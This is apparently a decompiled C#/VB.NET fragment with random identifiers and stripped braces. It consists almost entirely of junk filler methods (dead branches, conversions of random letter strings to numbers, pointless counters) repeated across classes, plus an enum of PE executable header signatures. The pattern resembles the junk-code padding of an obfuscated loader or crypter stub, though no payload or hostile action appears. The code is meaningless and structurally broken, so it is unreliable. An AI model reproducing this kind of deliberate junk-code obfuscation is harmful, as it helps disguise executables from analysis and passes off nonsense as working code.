private void mFktXhXvJbJzJefdzVIAsa()
string str1 = "lYKlkBJXJOrlVKssKDXwIf";
string str2 = "yklJClCxdhFDCctxbmspSx";
string str3 = "QZNIKEvblCIJPdewDsrcTY";
if (false)
str1 = "ETpthVWZQRutcCfsnWhXdC";
str2 = str3;
string Left = "vNRKIDXlXFKZYwUNptbHTu";
string str4 = "SuOJoipSjYieDuOWxPmHBc";
if (Operators.CompareString(Left, "iThdTJctAPRifpmnlZRGJU", false) == 0)
str4 = Conversions.ToString(Conversions.ToDouble(str3) + 422047.0);
str4 = "POJiNIkCtrmKlIOTHJIZQL";
private void xocsQfukTADEtgsNgocaRA()
int num1 = 208875;
int num2 = 255395;
int num3 = 353478;
num3 = num1 != num2 ? 650544 : checked (num1 - num2 + 86459);
string str1 = "xVZFKsYEhYQAzgNdoHfYFT";
string str2 = "HyTsVVLZwGQVKdJEwmGxCR";
if (Conversions.ToDouble(str1) > 0.0)
str2 = "jAPCJswgSJBUkNPPXpQzPH";
str2 = "zdRBrYmzWxORifxYERCJJr";
public class JfLUaVFOtnuOJnwEUAkhUzEIOoLV
public object YuVxlrZQcCfRrFnExoHdskvHibDT(string JhtUQLlIpXzFpQeJDjvWwOByJrBN)
string str1 = "gPNxznKgAJnisfNwkKhkokmCeJtI";
if (true)
str1 = "LJcJpCktjOpApbCnNbJKspONJRxh";
string str2 = "vYaVgwkYxIHKarfsBaOXggJJxoTi";
string str3 = "oPLHQNSpOhAHcyUuPjyIETDCsoKF";
if (Conversions.ToDouble(str2) == 453536759.0)
str3 = Conversions.ToString(1315218898);
return (object) str3;
private void DsJBGmPhylfbkIvDnbUPNeRrUpQb()
string str1 = "muuzrBNTwUJxRpPsYSRBxUiHKAFO";
string str2 = "CLCmkGtuLdzJdlhmBODnkAYkReAb";
string str3 = "sbbzNlzBjgdOWCnTkayFnnlrBYhn";
if (false)
str1 = "UBoZVxBcLTxQHPWwOZknXWnaRfWH";
str2 = str3;
string Left = "aIQfuPopeadmOHnkHNnaJaoUdDmu";
string str4 = "fNknCbJidGydrfcKYZGIHBgjYVVK";
if (Operators.CompareString(Left, "luQyhlXSsyzJBImgfHJpLogmjZPO", false) == 0)
str4 = Conversions.ToString(Conversions.ToDouble(str3) + 757182250.0);
str4 = "SklSDFSKQxIudJtxeLmKbcGJTzyR";
private void bzIYELtjPHDItPXBIEJfUQWzljbD()
int num1 = 947235358;
int num2 = 755190472;
int num3 = 499509791;
num3 = num1 != num2 ? 288765759 : checked (num1 - num2 + 276087246);
string str1 = "FJEghyPGtJVnGOaoFUQJnzlkJJUc";
string str2 = "goJrFiulhrPCNLLxzOSBOVHhyKms";
if (Conversions.ToDouble(str1) > 0.0)
str2 = "pdJChdymmjwgTSuwQXJADWcFOdBl";
public class jio898gufdfddf
private string uZ5vlQm5a83M97AfWF0182269hiKRgdsiud;
private int BscM4uhz350ZQS6yAfEe7GEZ3aBA6uIc63l689U0c4Qb6ojgdikfd;
private int sc4m3o1iAWf4Ugjgijgigd;
public jio898gufdfddf()
this.uZ5vlQm5a83M97AfWF0182269hiKRgdsiud = "dfkodfpogjdf";
this.BscM4uhz350ZQS6yAfEe7GEZ3aBA6uIc63l689U0c4Qb6ojgdikfd = 0;
this.sc4m3o1iAWf4Ugjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.uZ5vlQm5a83M97AfWF0182269hiKRgdsiud) > 0.0)
checked { ++this.BscM4uhz350ZQS6yAfEe7GEZ3aBA6uIc63l689U0c4Qb6ojgdikfd; }
checked { this.sc4m3o1iAWf4Ugjgijgigd += 3259285; }
private enum ImageSignatureTypes
IMAGE_OS2_SIGNATURE_LE = 17740, // 0x0000454C
IMAGE_VXD_SIGNATURE = 17740, // 0x0000454C
IMAGE_OS2_SIGNATURE = 17742, // 0x0000454E
IMAGE_NT_SIGNATURE = 17744, // 0x00004550
IMAGE_DOS_SIGNATURE = 23117, // 0x00005A4D
public class kpfddfg9089df
private string c1k47u9544mwaLomlhJkvaCy9ro5a5N4DMniNV42jogdsiud;
private int x49O28W85oPNS2x0mGzoUFZ547Ah4gWXwsrwWNWdIbY39jgdikfd;
private int XOsrN0Z6TZ0F4UyWefI82QHBI69vy95Icargjgijgigd;
public kpfddfg9089df()
this.c1k47u9544mwaLomlhJkvaCy9ro5a5N4DMniNV42jogdsiud = "dfkodfpogjdf";
this.x49O28W85oPNS2x0mGzoUFZ547Ah4gWXwsrwWNWdIbY39jgdikfd = 0;
this.XOsrN0Z6TZ0F4UyWefI82QHBI69vy95Icargjgijgigd = 3465456;
private void dsfksgioj()
if (Conversions.ToDouble(this.c1k47u9544mwaLomlhJkvaCy9ro5a5N4DMniNV42jogdsiud) > 0.0)
checked { ++this.x49O28W85oPNS2x0mGzoUFZ547Ah4gWXwsrwWNWdIbY39jgdikfd; }
checked { this.XOsrN0Z6TZ0F4UyWefI82QHBI69vy95Icargjgijgigd += 3259285; }